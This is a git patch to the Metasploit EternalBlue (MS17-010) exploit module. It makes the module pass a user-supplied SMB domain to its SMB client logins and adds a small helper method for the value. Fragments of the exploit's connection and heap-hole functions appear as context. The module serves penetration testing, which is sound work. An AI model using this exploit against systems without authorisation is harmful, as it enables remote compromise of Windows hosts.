From d489cd7248b3e6bcb653085b868f7db45b98a509 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 29 Aug 2018 23:53:58 +0200 Subject: [PATCH] ms17_010_eternalblue: use SMBDomain value when provided instead of ignoring it --- .../windows/smb/ms17_010_eternalblue.rb | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 0afc054971..e7742ac72b 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -322,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote def smb1_anonymous_connect_ipc sock = connect(false) dispatcher = RubySMB::Dispatcher::Socket.new(sock) - client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass) + client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass) response_code = client.login unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS @@ -365,7 +365,7 @@ class MetasploitModule < Msf::Exploit::Remote def smb1_free_hole(start) sock = connect(false) dispatcher = RubySMB::Dispatcher::Socket.new(sock) - client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass) + client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass) client.negotiate pkt = "" @@ -696,4 +696,18 @@ class MetasploitModule < Msf::Exploit::Remote '' end end + + # Returns the value to be passed to SMB clients for + # the domain. If the user has not supplied a domain + # it returns an empty string to trigger an anonymous + # logon. + # + # @return [String] the domain value + def smb_domain + if datastore['SMBDomain'].present? + datastore['SMBDomain'] + else + '' + end + end end